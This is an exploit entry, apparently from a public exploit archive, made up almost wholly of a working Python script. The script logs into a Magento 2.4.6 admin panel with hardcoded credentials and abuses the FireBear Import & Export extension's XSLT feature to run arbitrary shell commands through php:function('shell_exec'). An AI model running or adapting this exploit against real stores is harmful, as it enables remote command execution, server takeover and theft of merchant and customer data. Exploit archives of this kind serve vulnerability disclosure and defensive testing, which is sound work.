Exploit Title: FireBear Improved Import & Export ver. 3.8.6 for Magento 2.4.6 - XSLT Server Side Injection Command Execution # Date: 2023-11-17 # Exploit Author: tmrswrr # Vendor Homepage: https://commercemarketplace.adobe.com/ # Software Link: https://commercemarketplace.adobe.com/firebear-importexport.html # Version: FireBear ver. 3.8.6 # Tested on: Magento 2.4.6 Poc: https://github.com/capture0x/Magento-ver.-2.4.6/ Exploit: import requests from bs4 import BeautifulSoup import re import json import sys if len(sys.argv) != 3: print("Usage: python exploit.py <base_url> <command>") sys.exit(1) base_url = sys.argv[1] command = sys.argv[2] base_url = base_url.rstrip('/') + '/' login_page_url = base_url + "admin/" login_action_url = base_url + "admin/" import_job_edit_url = base_url + "import/job/edit/entity_id/21/" session = requests.Session() response = session.get(login_page_url) soup = BeautifulSoup(response.text, 'html.parser') form_key = soup.find('input', {'name': 'form_key'})['value'] login_payload = { 'form_key': form_key, 'login[username]': 'demo', 'login[password]': '1q2w3e4r5t' } headers = { 'Content-Type': 'application/x-www-form-urlencoded', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36' } login_response = session.post(login_action_url, headers=headers, data=login_payload) if login_response.ok and login_response.history: print("Login successful!") redirected_url = login_response.url print("Redirected URL:", redirected_url) import_job_edit_response = session.get(import_job_edit_url) soup = BeautifulSoup(import_job_edit_response.text, 'html.parser') second_form_key = soup.find('input', {'name': 'form_key'})['value'] print("Extracted Key") key = re.findall(r'key\/(.*?)\/', login_response.url)[0] second_post_url = f"{base_url}import/job/xslt/key/{key}/?isAjax=true" second_post_payload = f"form_data%5B%5D=file_path%2Bpub%2Fmedia%2Fimportexport%2Fh%2Fe%2Fhello_39.xml&form_data%5B%5D=xslt%2B%3C%3Fxml+version%3D%221.0%22+encoding%3D%22utf-8%22%3F%3E%0A%3Cxsl%3Astylesheet+version%3D%221.0%22%0Axmlns%3Axsl%3D%22http%3A%2F%2Fwww.w3.org%2F1999%2FXSL%2FTransform%22%0Axmlns%3Aphp%3D%22http%3A%2F%2Fphp.net%2Fxsl%22%3E%0A%3Cxsl%3Atemplate+match%3D%22%2F%22%3E%0A%3Cxsl%3Avalue-of+select%3D%22php%3Afunction('shell_exec'%2C'{command}')%22+%2F%3E%0A%3C%2Fxsl%3Atemplate%3E%0A%3C%2Fxsl%3Astylesheet%3E&form_data%5B%5D=import_source%2Bfile&form_data%5B%5D=type_file%2Bxml&form_data%5B%5D=host%2B&form_data%5B%5D=port%2B&form_data%5B%5D=username%2B&form_data%5B%5D=password%2B&form_data%5B%5D=type_file%2Bxml&form_data%5B%5D=import_source%2Bfile&form_data%5B%5D=file_upload%2B&form_data%5B%5D=predefined_structure%2B0&form_data%5B%5D=file_path%2Bpub%2Fmedia%2Fimportexport%2Fh%2Fe%2Fhello_39.xml&form_data%5B%5D=import_images_file_dir%2B&form_data%5B%5D=scan_directory%2B0&form_data%5B%5D=deferred_images%2B0&form_data%5B%5D=delete_file_after_import%2B0&form_data%5B%5D=archive_file_after_import%2B0&form_data%5B%5D=image_import_source%2B0&form_data%5B%5D=remove_current_mappings%2B0&form_data%5B%5D=associate_child_review_to_configurable_parent_product%2B0&form_data%5B%5D=associate_child_review_to_bundle_parent_product%2B0&form_key={second_form_key}" second_post_headers = { 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36', 'Referer': import_job_edit_response.url } second_post_response = session.post(second_post_url, headers=second_post_headers, data=second_post_payload) if second_post_response.ok: print("XSL Imported!") response_json = json.loads(second_post_response.text) result_xml = response_json.get("result", "") if result_xml is not None: result_xml = result_xml.replace("<?xml version=\"1.0\"?>", "\n") else: result_xml = "No Output found in the response." print("Output:", result_xml) else: print("Import failed.") print("Status Code:", second_post_response.status_code) print("Response:", second_post_response.text) else: print("Login failed.") session.close()